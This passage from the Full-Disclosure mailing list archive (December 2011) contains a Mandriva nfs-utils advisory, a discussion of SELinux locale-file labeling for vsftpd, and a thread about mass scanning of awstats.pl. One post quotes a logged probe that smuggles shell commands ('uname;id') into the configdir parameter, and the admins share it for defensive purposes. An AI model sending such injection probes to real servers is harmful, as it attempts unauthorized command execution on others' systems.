that the program is allowed to access, the open() will succeed.  There's no way
for it to say I'm opening what *should* be a locale_t file, so if I'm being
coerced into opening a user_foo_t, please nuke the request.



pgpVOvTimF1iF.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2011:186 ] nfs-utils

2011-12-12 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:186
 http://www.mandriva.com/security/
 ___

 Package : nfs-utils
 Date: December 12, 2011
 Affected: 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in nfs-utils:
 
 It was found that the mount.nfs tool did not handle certain errors
 correctly when updating the mtab (mounted file systems table)
 file. A local attacker could use this flaw to corrupt the mtab file
 (CVE-2011-1749).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1749
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 783fba0c19265b5085ecabdb594c6aeb  
2010.1/i586/nfs-utils-1.2.2-5.1mdv2010.2.i586.rpm
 73c7032c9e3e8233e130ca38f912a159  
2010.1/i586/nfs-utils-clients-1.2.2-5.1mdv2010.2.i586.rpm 
 0b02667babf7b3fdbd2284dc2d7d63c9  
2010.1/SRPMS/nfs-utils-1.2.2-5.1mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 a2fec775cd5a467748caf78b62c7ce1d  
2010.1/x86_64/nfs-utils-1.2.2-5.1mdv2010.2.x86_64.rpm
 9447399cbd7623165af0bea26d2fa065  
2010.1/x86_64/nfs-utils-clients-1.2.2-5.1mdv2010.2.x86_64.rpm 
 0b02667babf7b3fdbd2284dc2d7d63c9  
2010.1/SRPMS/nfs-utils-1.2.2-5.1mdv2010.2.src.rpm

 Mandriva Enterprise Server 5:
 1267af5074d0f250ea50fa1f816cc7bc  
mes5/i586/nfs-utils-1.1.3-10.3mdvmes5.2.i586.rpm
 b39e42c513fe9354c663e7da9bb5c136  
mes5/i586/nfs-utils-clients-1.1.3-10.3mdvmes5.2.i586.rpm 
 72a3bcd0407307daacd5e63b7758ae64  
mes5/SRPMS/nfs-utils-1.1.3-10.3mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 0fe6d6710db58f72f7f4bade38a9c741  
mes5/x86_64/nfs-utils-1.1.3-10.3mdvmes5.2.x86_64.rpm
 84b6a01600724ac3bb2d2bd8a56fd919  
mes5/x86_64/nfs-utils-clients-1.1.3-10.3mdvmes5.2.x86_64.rpm 
 72a3bcd0407307daacd5e63b7758ae64  
mes5/SRPMS/nfs-utils-1.1.3-10.3mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFO5kJFmqjQ0CJFipgRApTMAJ9ZoxPUs78HRH2NKU+k90tLJp582wCeNOf2
/6bpLm2Y7mosXizvh5YtpHs=
=rXfq
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Ramon de C Valle

 To fill in the SELinux details for the people following along at
 home:
 
 The problem is that at open() time, there's no good way to specify
 what the
 expected label is (now *that* might be an interesting extention to
 open() for
 some enterprisng grad student) - so as long as the file has *any*
 foo_t label
 that the program is allowed to access, the open() will succeed.
  There's no way
 for it to say I'm opening what *should* be a locale_t file, so if
 I'm being
 coerced into opening a user_foo_t, please nuke the request.
Exactly. Thanks for putting this into more concise wording.

 
 

-- 
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread lists

Valdis.Kletnieks vt.edu:

 The problem is that at open() time, there's no good way to specify what the
 expected label is (now *that* might be an interesting extention to open() for
 some enterprisng grad student) - so as long as the file has *any* foo_t label
 that the program is allowed to access, the open() will succeed.  There's no 
 way
 for it to say I'm opening what *should* be a locale_t file, so if I'm being
 coerced into opening a user_foo_t, please nuke the request.

That sounds like a confused deputy.
http://www.cis.upenn.edu/~KeyKOS/ConfusedDeputy.html

Is it reasonable to obtain all timezone data at program startup and
refuse to open locale-related files after chroot?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Ramon de C Valle
  But how can I state that ftp has access to the users homedir and
  not
  allow access to user_home_t?
 This is a good question. Actually, we shouldn't allow ftpd_t read the
 locale files from within user_home_t directories. But now I'm not
 sure if this will be possible.
A different file context for /home/(.*)/usr/share/zoneinfo(/.*) in vsftpd 
policy module would be a feasible solution? Will ftpd_t honour this when 
creating new files?

-- 
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-12 Thread Valdis . Kletnieks
On Mon, 12 Dec 2011 19:19:20 EST, Ramon de C Valle said:

 Actually, this is has no relation with binaries. Transitions are defined per 
 domain in SELinux policy. For additional information, refer to:
 http://danwalsh.livejournal.com/23944.html

Exactly the point - that's how most transitions are done.

However, if you want to start off in an SELinux context that can read locale_t,
open the file, chroot, and then change to another context that can't reade
locale_t, then you're going to need to use setcon() in the process rather than
just letting execcon based transitions letting it happen.  And at that point,
you just bought a hole bunch more headache, because now you need to do setcon()
*securely* rather than just get transitioned into an ftpd_t just by getting
exec'ed.

  We're lucky nobody has looked into what should happen on an
  MLS-enabled system :)
 I don't think sensitivity levels would make any difference in this case in 
 the current SELinux MLS policy.

No, but if user A and user B are in different sensitivity levels, it's even
more loads of fun to make sure that the ftpd can get to the proper sensitivity
level for each user via setcon() without botching it.



pgp0VRnLZvvJ5.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New awstats.pl vulnerability?

2011-12-12 Thread Grandma Eubanks
Hello,

It certainly happens. It's very random who scanners decide to hit. You may
have JUST been crawled and passed around several lists as possibilities. To
put some perspective on what you're seeing, the company I work for has
about 3k clients and within the past hour (just checked now), we got abut
5,122 attempts for this one vulnerability in our environment.

On Mon, Dec 12, 2011 at 6:30 PM, Lamar Spells lamar.spe...@gmail.comwrote:

 For the past several days, I have been seeing thousands of requests
 looking for awstats.pl like this one:

 GET /awstats/awstats.pl ? configdir=|echo;echo YYYAAZ;uname;id;echo
 YYY;echo|

 I am dropping these requests due to previous (and very old) issues
 with awstats (see CVE-2006-3682).

 But this leaves me wondering if there is a new vuln lurking here somewhere.

 Anyone else seeing the same thing?

 Regards,

 Lamar Spells

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New awstats.pl vulnerability?

2011-12-12 Thread Bruce Ediger
On Mon, 12 Dec 2011, Lamar Spells wrote:

 For the past several days, I have been seeing thousands of requests
 looking for awstats.pl like this one:

Yeah, me too.  They just started up.  I haven't seen any awstats.pl
requests since 2010-05-18, and now I've gotten batches of them, since
about 2011-11-22, but heavier since the start of December.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] New awstats.pl vulnerability?

2011-12-12 Thread Nikolay Kichukov
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Same here, I even tried to notify a bunch of the ISP registrators of the IP 
address range those originated from.

- -Nik



On 12/13/2011 07:30 AM, Bruce Ediger wrote:
 On Mon, 12 Dec 2011, Lamar Spells wrote:
 
 For the past several days, I have been seeing thousands of requests
 looking for awstats.pl like this one:
 
 Yeah, me too.  They just started up.  I haven't seen any awstats.pl
 requests since 2010-05-18, and now I've gotten batches of them, since
 about 2011-11-22, but heavier since the start of December.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJO5vwQAAoJEDFLYVOGGjgX8oEH/i3kjBAtJcT1DJvJVcRX4O+9
t2UcvehxpyjalhCttTmQrE8EcLrtGS62K0ZziNQPvXirOtJ0ERcaARsQFiTT7fCi
YyEuNDa15nx+wS2dgnKWEyCjz356RobtXgFflrbfHNPmBCRGd/qM3VzquUDYRdef
E+JtU0J3RgilXxMFLrZK5GHwZOUKNebv/T6bRPescMzRsX/DO89Csv0kWJM9xvyI
kd0El+/thw8aj9/21dB/JWhdbiBozuKd2MG1hTog/xKFVzVqdTzkNoZ7Ok15n91v
LoAx7cLqDInmx1syDLOSMhzRoyqGAA9Uq/WuTpDqTDcHjVwjGJPeYjc97dIJWdY=
=0+7+
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/